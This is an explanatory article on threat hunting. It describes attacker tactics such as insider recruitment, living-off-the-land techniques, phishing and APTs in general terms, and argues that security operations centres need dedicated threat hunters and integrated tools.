Threat Hunting Aims

Digitization of commercial and governmental activities has become a major source of wealth, and a key factor that differentiates organizations from their competitors. Hackers therefore, with new economic, political, and strategic goals, have developed increasingly sophisticated techniques to illegally access confidential intellectual property. .

New Techniques and Tactics Used in Cyberattacks

As companies and governments continue to expand into the digital world, there are more incentives to develop new, sophisticated strategies to bypass perimeter security solutions (firewalls, UTMs, SCMs, NGFWs, etc.) and local ones (antivirus, EDR, NGAV, etc.) without being detected. New tactics used in cyberattacks include:

  • Recruitment of company employees (insiders) who make it easier to access IT systems.

  • Exploiting legitimate tools already installed on IT systems and which therefore go undetected by security solutions. These are known as ‘living off the land’ techniques.

  • Use of social engineering to deceive company users and clients (phishing) and create an environment that provides access to its IT systems.

  • Use of multiple infection vectors to bypass organization defenses and then move laterally to obtain a position from which high-value objectives can be targeted.

The spread of these advanced techniques and tactics has seen the rise of a new category of malware: APTs, or Advanced Persistent Threats. These are targeted attacks with very specific goals and which delay the inclusion of digital signatures into the signature files used by security providers in their traditional protection solutions. These sort of advanced attacks thereby maximize the window of opportunity for reaching their targets.

For this reason, the ‘sit and wait’ approach used by conventional security tools in dealing with APTs and similar threats means the exposure time will extend on average to 175 days from the beginning of an attack until it is visible and detectable. It is therefore often down to law enforcement agencies or credit card companies to pick up the pieces, and by then companies’ reputations can be severely affected.

The Response: Threat Hunting

Governments and corporations have identified this risk and have allocated larger budgets for creating specialized resources: a new group of professionals focused on detecting and repelling this type of cyberattack. Generally known as ‘threat hunters’, this figure has the knowledge necessary to detect new cyberattack techniques and tactics, and leverage a new set of advanced tools to bolster the traditional security products already implemented by companies.

Threat hunting tools enable SOCs within organizations to face their main challenges:

  • Difficulty finding qualified staff to perform experienced security analyst tasks.

  • Larger number of potentially dangerous situations that companies face. This can exceed the capacity of the SOC, and increase the chances of real alerts not being investigated due to lack of time or resources.

  • The growing number of sophisticated tools required and the absence of a single, centralized solution that meets all the needs of SOCs underlines the need for highly integrated tools to deliver a cohesive and flexible software solution.

For this reason, companies and nations are forced to contemplate far larger budgets if they want to face these new attacks and protect their intellectual property and credibility.